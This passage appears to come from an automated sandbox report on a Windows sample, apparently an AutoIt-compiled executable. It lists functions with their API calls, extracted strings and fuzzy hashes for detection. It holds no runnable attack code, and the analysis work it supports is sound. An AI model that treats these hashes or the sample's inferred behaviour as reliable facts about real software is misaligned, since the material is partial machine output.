                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                            • Instruction ID: a3c21903c3770ffb72aae5cac2318d288445a338e13b09047dbda6be7b6b34b7
                                                            • Opcode Fuzzy Hash: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
                                                            • Instruction Fuzzy Hash: B091AB746003108FCB0AEF11C452AAEB7E5AF99354F058969F8965F7E2CB34ED49CB81
                                                            Function 003EB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EB8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003E91C2), ref: 003EB910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003EB98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 003EB9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EB9DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,003E91C2), ref: 003EB9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EBA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EBA17
                                                              • Part of subcall function 00382EFD: __wcsicmp_l.LIBCMT ref: 00382F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                            • Instruction ID: ba2e5571981742d7de27db7519ab3c54047ea8a525ba8d311e345a486cf4a3d8
                                                            • Opcode Fuzzy Hash: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
                                                            • Instruction Fuzzy Hash: 7461C071500269BFEB16DF65CC81FBBB7ACEB08710F108216F915DA1D1DBB4A980DBA0
                                                            Function 003CDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 003CDCDC
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 003CDCEC
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003CDCF8
                                                            • __wsplitpath.LIBCMT ref: 003CDD56
                                                            • _wcscat.LIBCMT ref: 003CDD6E
                                                            • _wcscat.LIBCMT ref: 003CDD80
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDD95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDA9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDDB
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDFC
                                                            • _wcscpy.LIBCMT ref: 003CDE08
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003CDE47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 3566783562-438819550
                                                            • Opcode ID: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                            • Instruction ID: 63eb0c0c7a0c361ae459d3cdb654d8b8839f391e8278b833a96d59a02ade4d08
                                                            • Opcode Fuzzy Hash: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
                                                            • Instruction Fuzzy Hash: D06159765042459FCB11EF60C844EAEB3E8BF89314F04892EF999CB251DB71ED45CB92
                                                            Function 003C9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003C9C7F
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003C9CA0
                                                            • __swprintf.LIBCMT ref: 003C9CF9
                                                            • __swprintf.LIBCMT ref: 003C9D12
                                                            • _wprintf.LIBCMT ref: 003C9DB9
                                                            • _wprintf.LIBCMT ref: 003C9DD7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-3080491070
                                                            • Opcode ID: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                            • Instruction ID: 6b216ffa711c790f23f49b5a254fc7afdf0b033c1b4401397eb3c7399335a6bb
                                                            • Opcode Fuzzy Hash: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
                                                            • Instruction Fuzzy Hash: D4517232900509AACF16FBE0CD46EEEB778AF14304F60406AF505B61A1DB352F59DF65
                                                            Function 003CA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 003CA3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 003CA418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA4C5
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
                                                            • Instruction ID: 845767d8fdf54337c6f80f7134c570832cf736c1ed9a3076188f922fd455bcdb
                                                            • Opcode Fuzzy Hash: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
                                                            • Instruction Fuzzy Hash: EB517E711047049FC705EF21C881D6AB3E8FF98758F50896DF89A9B2A1DB71ED09CB52
                                                            Function 003BF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003BF8DF
                                                            • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF8E8
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003BF90A
                                                            • LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF90D
                                                            • __swprintf.LIBCMT ref: 003BF95D
                                                            • __swprintf.LIBCMT ref: 003BF96E
                                                            • _wprintf.LIBCMT ref: 003BFA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003BFA2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
                                                            • Instruction ID: 4f1320faf510fe58d7d0e4d0fb015e85ce04d4582fb347b5b0f466d43973ea45
                                                            • Opcode Fuzzy Hash: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
                                                            • Instruction Fuzzy Hash: 94414F7280020DAACF16FBE0DD86EEEB778AF14304F504065F605BA096EB756F49CB61
                                                            Function 003EBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003E9207,?,?), ref: 003EBA56
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA78
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 003EBA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 003EBAA6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,003F2CAC,?), ref: 003EBAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 003EBAE7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 003EBB0B
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003EBB36
                                                            • DeleteObject.GDI32(00000000), ref: 003EBB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EBB74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
                                                            • Instruction ID: 0235d1cf4e1bcb3e1ae1539c16f163627d166b6937a1311645b755cb46bdf555
                                                            • Opcode Fuzzy Hash: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
                                                            • Instruction Fuzzy Hash: 09413B75500259EFDB239F66DC88EABBBBCEB89711F114268F905DB2A0D7709901CB60
                                                            Function 003CD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 003CDA10
                                                            • _wcscat.LIBCMT ref: 003CDA28
                                                            • _wcscat.LIBCMT ref: 003CDA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 003CDA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 003CDA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CDAA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
                                                            • Instruction ID: 38349f71ff5e21c6f6c9e022378b1956485782a0fb3d6b11b44d5d3bb4f56507
                                                            • Opcode Fuzzy Hash: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
                                                            • Instruction Fuzzy Hash: B8814C765043419FCB66EF64C884E6AB7E8AB89310F15893EF889CB251E730ED45CB52
                                                            Function 003EC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EC1FC
                                                            • GetFocus.USER32 ref: 003EC20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 003EC217
                                                            • _memset.LIBCMT ref: 003EC342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003EC36D
                                                            • GetMenuItemCount.USER32(?), ref: 003EC38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 003EC3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003EC3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003EC41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EC454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EC489
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 74c089327e292ca34c293f040b939250ec122ba01389e8ff06d91856ce105b58
                                                            • Instruction ID: b75bdd8c52bd0fda7597bb587c35d3579004ab67729188f9ea61d97ade5ee47c
                                                            • Opcode Fuzzy Hash: 74c089327e292ca34c293f040b939250ec122ba01389e8ff06d91856ce105b58
                                                            • Instruction Fuzzy Hash: FD818E712183A19FDB22DF16C884A6FBBE8FB88314F014A2DF995972D1C770D906CB52
                                                            Function 003D731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 003D738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003D739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 003D73A7
                                                            • SelectObject.GDI32(00000000,?), ref: 003D73B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003D7408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003D7444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003D7468
                                                            • SelectObject.GDI32(00000006,?), ref: 003D7470
                                                            • DeleteObject.GDI32(?), ref: 003D7479
                                                            • DeleteDC.GDI32(00000006), ref: 003D7480
                                                            • ReleaseDC.USER32(00000000,?), ref: 003D748B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: c862bd8c64cc6e3e90a600f5d82d0f653659336a854ce4d4227e854415c470e8
                                                            • Instruction ID: 97546114243909e2fcabf5df30a1f35fe066164ab8f3962686ea705f9e14c265
                                                            • Opcode Fuzzy Hash: c862bd8c64cc6e3e90a600f5d82d0f653659336a854ce4d4227e854415c470e8
                                                            • Instruction Fuzzy Hash: 8B514C76904209EFCB26CFA8DC84AAEBBB9EF48310F14851AF95997250D771AD408B50
                                                            Function 00366A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00380957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00366B0C,?,00008000), ref: 00380973
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00366CFA
                                                              • Part of subcall function 0036586D: _wcscpy.LIBCMT ref: 003658A5
                                                              • Part of subcall function 0038363D: _iswctype.LIBCMT ref: 00383645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 4e5892c76285d106af0ac444698f3b813c9ab3f6770cfe228f0d0a00a241de36
                                                            • Instruction ID: 20958010e23b040b8a751b825ec6b95ce947de89cf65c95ddacaef47433f6ece
                                                            • Opcode Fuzzy Hash: 4e5892c76285d106af0ac444698f3b813c9ab3f6770cfe228f0d0a00a241de36
                                                            • Instruction Fuzzy Hash: CA02BE311083419FCB26EF24C891AAFBBE5FF95354F10892DF4959B2A2DB30D949CB52
                                                            Function 003C2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C2DDD
                                                            • GetMenuItemCount.USER32(00425890), ref: 003C2E66
                                                            • DeleteMenu.USER32(00425890,00000005,00000000,000000F5,?,?), ref: 003C2EF6
                                                            • DeleteMenu.USER32(00425890,00000004,00000000), ref: 003C2EFE
                                                            • DeleteMenu.USER32(00425890,00000006,00000000), ref: 003C2F06
                                                            • DeleteMenu.USER32(00425890,00000003,00000000), ref: 003C2F0E
                                                            • GetMenuItemCount.USER32(00425890), ref: 003C2F16
                                                            • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C2F4C
                                                            • GetCursorPos.USER32(?), ref: 003C2F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 003C2F5F
                                                            • TrackPopupMenuEx.USER32(00425890,00000000,?,00000000,00000000,00000000), ref: 003C2F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C2F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
                                                            • Instruction ID: 6ccc0cc7b587e832c3c94ae962c3f4538fd7a4c09147ac6123a1e85b536a7f6a
                                                            • Opcode Fuzzy Hash: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
                                                            • Instruction Fuzzy Hash: 1771A270600259BEEB229F64DC89FABBF68FF05354F14421AF625EA1E1C7B16C10DB91
                                                            Function 003D88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003D88D7
                                                            • CoInitialize.OLE32(00000000), ref: 003D8904
                                                            • CoUninitialize.OLE32 ref: 003D890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 003D8A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 003D8B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003F2C0C), ref: 003D8B6F
                                                            • CoGetObject.OLE32(?,00000000,003F2C0C,?), ref: 003D8B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 003D8BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003D8C25
                                                            • VariantClear.OLEAUT32(?), ref: 003D8C35
